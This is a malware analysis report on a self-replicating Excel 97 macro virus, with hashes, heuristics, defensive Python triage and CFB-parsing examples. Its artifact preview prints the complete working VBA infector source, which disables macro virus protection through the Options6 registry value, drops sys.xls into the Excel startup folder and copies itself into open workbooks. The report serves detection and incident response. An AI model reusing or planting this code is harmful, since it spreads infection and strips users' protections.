Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fde0dc509db9ccae…

MALICIOUS

Office (OLE)

Size: 56.5 KB | Created: 1999-02-08 09:24:15 | Authoring application: Microsoft Excel | First seen: 2012-06-14
MD5: 32d63609263f3e1371d2e9da3b42a7cb | SHA-1: fbbd9068fb7d65ee3bb7fa936ec13eb9518bd8b5 | SHA-256: fde0dc509db9ccae89466adf4030df690ac4448663f2be7804325472d26129be
Risk score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic | T1137.001 Office Template Macros (copy saved as sys.xls in the Excel startup folder) | T1562.001 Disable or Modify Tools (Excel 97 macro virus protection switched off via the Options6 registry value)

This Excel 97 workbook carries a self-replicating VBA macro virus, not a downloader or dropper. The Workbook_Open and Workbook_BeforeClose handlers open HKCU\Software\Microsoft\Office\8.0\Excel\Microsoft Excel and write the DWORD value Options6 = 0. That value is the Excel 97 "macro virus protection" setting, so the write silences the macro warning; it is not a startup entry. Persistence comes from Excel's own startup folder: if no workbook named sys.xls is open, Workbook_Open creates a new workbook, saves it as Application.StartupPath & "\sys.xls" (the XLSTART directory, which Excel loads on every launch), infects it and closes it with changes saved. Replication uses the VBA extensibility object model: the ThisWorkbook module is exported to c:\office.sys and imported with AddFromFile into the ThisWorkbook module of every open VBProject whose module is empty (CountOfLines <= 1), after deleting the first four lines of the imported text (the module header written by Export). Projects that raise error 50289 (project is protected) are skipped via Resume 5. Workbook_Activate and Workbook_BeforeClose call the same routine (Infect), so any workbook opened, switched to or closed while an infected workbook is loaded is a candidate host. The extracted code contains no network activity, no second-stage download and no dropped executable.

Note on the two structural findings below (OLE_SLACK_ANOMALY, OLE_PARSE_EMPTY_STREAMS): both are raised against the carved child bodies, not the top-level workbook. Both children run to the end of the parent file (0x60A8 + 33,112 = 0x90B0 + 20,816 = 57,856 bytes, the file size) and the second starts inside the first, which is what a CFB signature hit inside a parent container looks like when carved to EOF. A body carved from mid-file has no usable FAT or directory of its own, so "declared streams total 0 bytes" and "no readable streams" follow from the carving and should not be read as evidence of a hidden shellcode payload.
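As an added example (not the report's own tooling), the following Python triage pass scores decoded VBA source for the indicators visible in this sample and pulls out the IOCs a responder needs: the dropped module file, the registry key and value, and the filename written to the Excel startup folder. The input is a constructed excerpt quoting lines from the macro preview in this report; the indicator names, weights and verdict thresholds are this example's own assumptions.

```python
import re

# Constructed input: lines quoted from the macro preview in this report.
SAMPLE_VBA = r'''
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" _
(ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, _
ByVal samDesired As Long, phkResult As Long) As Long
Private Sub Workbook_Open()
u = RegOpenKeyExA(HKEY_CURRENT_USER, _
"Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0&, _
KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0&, REG_DWORD, lngData, 4)
Application.DisplayAlerts = False
Application.Workbooks.Add
ActiveWorkbook.SaveAs (Application.StartupPath & "\sys.xls")
Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").Export "c:\office.sys"
For Each yactgf In VBProject.VBE.VBProjects
yactgf.VBComponents(yactxg).CodeModule.AddFromFile "c:\office.sys"
Next yactgf
End Sub
'''

# (indicator, regex, weight). Weights are this example's own, not the report's scoring.
INDICATORS = [
    ("auto_exec_handler", r"^\s*(Private\s+)?Sub\s+Workbook_(Open|Activate|BeforeClose)\b", 2),
    ("vbproject_access", r"\b(VBProject|VBComponents|CodeModule)\b", 3),
    ("module_export", r"\.Export\s+\"", 3),
    ("module_import", r"\.AddFromFile\b", 3),
    ("office_startup_path", r"\bStartupPath\b", 3),
    ("registry_api", r"\bReg(OpenKeyEx|SetValueEx|CreateKeyEx)A?\b", 2),
    ("excel97_macro_protection_key", r"Software\\Microsoft\\Office\\8\.0\\Excel\\Microsoft Excel", 3),
    ("suppress_alerts", r"\bDisplayAlerts\s*=\s*False\b", 1),
]


def triage_vba(src):
    """Score decoded VBA source against INDICATORS and extract IOCs.
    VBA is case-insensitive, so every pattern is matched with IGNORECASE."""
    flags = re.MULTILINE | re.IGNORECASE
    matched = [(name, w) for name, pat, w in INDICATORS if re.search(pat, src, flags)]
    names = [n for n, _ in matched]
    iocs = {
        # Absolute Windows paths written or read by the macro (deduplicated, order kept).
        "dropped_files": list(dict.fromkeys(re.findall(r'"([A-Za-z]:\\[^"]+)"', src))),
        # Registry subkeys passed to the advapi32 declares.
        "registry_keys": list(dict.fromkeys(re.findall(r'"(Software\\[^"]+)"', src))),
        # Value names written with RegSetValueEx(A).
        "registry_values": re.findall(r'RegSetValueExA?\(\s*\w+\s*,\s*"([^"]+)"', src),
        # Files placed in Excel's startup folder (XLSTART) for auto-load persistence.
        "startup_files": re.findall(r'StartupPath\s*&\s*"\\([^"]+)"', src),
    }
    score = sum(w for _, w in matched)
    # Self-replication needs all three: reach into VBProjects, import code, persist in XLSTART.
    if {"vbproject_access", "module_import", "office_startup_path"} <= set(names):
        verdict = "self-replicating macro infector with Excel startup-folder persistence"
    elif score >= 5:
        verdict = "suspicious macro"
    else:
        verdict = "no infector indicators"
    return {"score": score, "matched": names, "iocs": iocs, "verdict": verdict}


if __name__ == "__main__":
    result = triage_vba(SAMPLE_VBA)
    print(result["verdict"], result["score"])
    for kind, values in result["iocs"].items():
        print(kind, values)
```

In practice the input is the text that olevba prints for the sample; the IOC lists feed directly into a host sweep for the startup-folder copy and the exported module file, and into a registry check on the Options6 value.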

Heuristics (6)

  • ClamAV: Xls.Trojan.Adversary-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Adversary-1
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 33,112 bytes but its declared streams total only 0 bytes — 33,112 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open auto-execute handler present. The same module also defines Workbook_Activate and Workbook_BeforeClose handlers, so the code runs on open, on switching to the workbook and on close.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
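The two structural findings (OLE_SLACK_ANOMALY and OLE_PARSE_EMPTY_STREAMS) are computed from the CFB header, the FAT and the directory chain. The following is an added example, not the report's tooling, of a minimal CFB walker that reproduces both checks. `build_sample_cfb` constructs a tiny synthetic image for demonstration (it is not the sample); pointing its directory outside the image reproduces the "valid header, no readable streams" condition that a child carved from the middle of a parent file produces.

```python
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
HEADER_SIZE = 512
ENDOFCHAIN = 0xFFFFFFFE
FREESECT = 0xFFFFFFFF
FATSECT = 0xFFFFFFFD
NOSTREAM = 0xFFFFFFFF


def _chain(fat, start, max_len):
    """Follow a FAT chain from `start`; None if it leaves the FAT (carved or
    truncated blob) or loops (corrupt FAT)."""
    chain, cur = [], start
    while cur != ENDOFCHAIN:
        if cur >= len(fat) or cur in chain or len(chain) >= max_len:
            return None
        chain.append(cur)
        cur = fat[cur]
    return chain


def analyse_cfb(data):
    """Reproduce the report's two CFB-structure checks: declared stream bytes vs
    bytes present, and a valid header whose directory cannot be walked."""
    r = {"valid_header": False, "directory_readable": False, "file_size": len(data),
         "streams": [], "declared_total": 0, "unaccounted": len(data), "findings": []}
    if len(data) < HEADER_SIZE or data[:8] != CFB_MAGIC:
        return r
    r["valid_header"] = True
    sector_size = 1 << struct.unpack_from("<H", data, 0x1E)[0]
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    difat = struct.unpack_from("<109I", data, 0x4C)       # FAT sector list in the header
    n_sectors = (len(data) - HEADER_SIZE) // sector_size  # complete sectors present

    fat = []
    for fat_sec in difat[:min(n_fat, 109)]:
        if fat_sec >= n_sectors:                          # FAT sector lies outside this blob
            break
        fat.extend(struct.unpack_from("<%dI" % (sector_size // 4), data,
                                      (fat_sec + 1) * sector_size))
    dir_chain = _chain(fat, first_dir, n_sectors) if fat else None
    if not dir_chain or max(dir_chain) >= n_sectors:
        r["findings"].append("OLE_PARSE_EMPTY_STREAMS: valid header, directory unreadable")
        return r                                          # whole blob stays unaccounted

    r["directory_readable"] = True
    for sec in dir_chain:
        base = (sec + 1) * sector_size
        for i in range(sector_size // 128):
            e = data[base + i * 128: base + (i + 1) * 128]
            name_len = struct.unpack_from("<H", e, 0x40)[0]
            if e[0x42] != 2 or name_len < 2:              # type 2 = stream; skip storages/unused
                continue
            name = e[:name_len - 2].decode("utf-16-le", "replace")
            size = struct.unpack_from("<I", e, 0x78)[0]  # v3 files: low dword is the size
            r["streams"].append((name, size))
            r["declared_total"] += size

    allocated = sum(1 for v in fat[:n_sectors] if v != FREESECT)
    r["unaccounted"] = len(data) - HEADER_SIZE - allocated * sector_size
    if r["declared_total"] == 0:
        r["findings"].append("OLE_SLACK_ANOMALY: declared streams total 0 bytes")
    elif r["unaccounted"] > 0:
        r["findings"].append("%d bytes in unallocated sector slack" % r["unaccounted"])
    return r


def build_sample_cfb(dir_sector=1, trailing_free_sectors=2):
    """Constructed test image (not the sample): header, FAT in sector 0, directory
    in sector 1, a 4096-byte 'Workbook' stream in sectors 2-9, then junk sectors
    marked free. A `dir_sector` beyond the image mimics a carved child."""
    ss = 512
    hdr = bytearray(ss)
    hdr[0:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)      # v3, 512-byte sectors
    struct.pack_into("<9I", hdr, 0x28, 0, 1, dir_sector, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))      # one FAT sector: 0
    fat = [FREESECT] * (ss // 4)
    fat[0], fat[1] = FATSECT, ENDOFCHAIN                  # FAT itself; single-sector directory
    for s in range(2, 9):
        fat[s] = s + 1                                    # stream chain 2 -> 3 -> ... -> 9
    fat[9] = ENDOFCHAIN
    fat_sec = struct.pack("<128I", *fat)

    def entry(name, obj_type, child, start, size):
        e = bytearray(128)
        n = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(n)] = n
        struct.pack_into("<HBB", e, 0x40, len(n), obj_type, 1)
        struct.pack_into("<III", e, 0x44, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 0x74, start, size)
        return bytes(e)

    dir_sec = (entry("Root Entry", 5, 1, ENDOFCHAIN, 0)
               + entry("Workbook", 2, NOSTREAM, 2, 4096) + bytes(256))
    stream = bytes(range(256)) * 16                       # 4096 bytes of filler
    junk = b"\xCC" * (ss * trailing_free_sectors)         # on disk, but free in the FAT
    return bytes(hdr) + fat_sec + dir_sec + stream + junk


if __name__ == "__main__":
    print(analyse_cfb(build_sample_cfb()))
    print(analyse_cfb(build_sample_cfb(dir_sector=50)))
```

Run against a whole file, the slack figure is meaningful; run against a body carved from mid-file, the directory pointer lands in sectors that belong to the parent, and the walker returns the same "valid header, no readable streams, 100% unaccounted" result that the two heuristics above report for the carved children.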

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5138 bytes
SHA-256: 88191cf5667af9e5471e13430564f0eb9408a9e04f73cd8413fbd6d9a5135929
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Compare Text 'FRIEND
Private Declare Function RegOpenKeyExA Lib "advapi32.dll" _
(ByVal hKey As Long, ByVal lpSubKey As _
String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "advapi32.dll" _
(ByVal hKey As Long, ByVal lpValueName As _
String, ByVal Reserved As Long, ByVal dwType As Long, _
lpData As Any, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" _
(ByVal hKey As Long) As Long
Const HKEY_CURRENT_USER = &H80000001
Const KEY_ALL_ACCESS = &H3F
Const lngData As Long = 0
Const REG_DWORD As Long = 4
Private Sub Workbook_Activate()
Infect
End Sub
Function Infect()
On Error GoTo xnctsg
Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").Export "c:\office.sys"
For Each yactgf In VBProject.VBE.VBProjects
xcctsg = yactgf.VBComponents.Count
For Each xcctxg In yactgf.VBComponents
yactxg = xcctxg.Name
If yactxg = "ThisWorkbook" Then
If yactgf.VBComponents(yactxg).CodeModule.CountOfLines <= 1 Then
yactgf.VBComponents(yactxg).CodeModule.AddFromFile "c:\office.sys"
With yactgf.VBComponents(yactxg).CodeModule
For asjjh = 1 To 4
.DeleteLines 1
Next asjjh
End With
End If
End If
Next xcctxg
5 Next yactgf
Exit Function
xnctsg:
If Err.Number = 50289 Then
Err.Clear
Resume 5
End If
End Function
Private Sub Workbook_Open()
u = RegOpenKeyExA(HKEY_CURRENT_USER, _
"Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0&, _
KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0&, REG_DWORD, lngData, 4)
u = RegCloseKey(k)
Application.DisplayAlerts = False
Application.ScreenUpdating = False
For Each wbxxc In Workbooks
If wbxxc.Name = "sys.xls" And ThisWorkbook.Name <> "sys.xls" Then
Application.DisplayAlerts = True
Application.ScreenUpdating = True
Exit Sub
End If
If wbxxc.Name = "sys.xls" And ThisWorkbook.Name = "sys.xls" Then GoTo 99
Next wbxxc
Application.Workbooks.Add
ActiveWorkbook.SaveAs (Application.StartupPath & "\sys.xls")
ActiveWindow.Visible = True
99 On Error GoTo xnctsg
If ThisWorkbook.Name = "sys.xls" Then
Application.Workbooks.Add
End If
Application.ThisWorkbook.VBProject.VBComponents("ThisWorkbook").Export "c:\office.sys"
For Each yactgf In VBProject.VBE.VBProjects
xcctsg = yactgf.VBComponents.Count
For Each xcctxg In yactgf.VBComponents
yactxg = xcctxg.Name
If yactxg = "ThisWorkbook" Then
If yactgf.VBComponents(yactxg).CodeModule.CountOfLines <= 1 Then
yactgf.VBComponents(yactxg).CodeModule.AddFromFile "c:\office.sys"
With yactgf.VBComponents(yactxg).CodeModule
For asjjh = 1 To 4
.DeleteLines 1
Next asjjh
End With
End If
End If
Next xcctxg
5 Next yactgf
Application.Workbooks("sys.xls").Close savechanges:=True
Application.DisplayAlerts = True
Application.ScreenUpdating = True
Exit Sub
xnctsg:
If Err.Number = 50289 Then
Err.Clear
Resume 5
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
u = RegOpenKeyExA(HKEY_CURRENT_USER, _
"Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0&, _
KEY_ALL_ACCESS, k)
u = RegSetValueExA(k, "Options6", 0&, REG_DWORD, lngData, 4)
u = RegCloseKey(k)
If ThisWorkbook.Name = "sys.xls" Then Exit Sub
Infect
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attrib
... (truncated)
embedded_office_off000060a8.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x60A8 | 33112 bytes
SHA-256: 138ce92b9e06a6785db7b3e345004b6af2bf3b97ea73eca70608a31ecdf9dd26
embedded_office_off000090b0.ole | embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x90B0 | 20816 bytes
SHA-256: 5608815c044265ec86130ceedebb47ef8e9e5f0b53baa26e69eb5fe135862536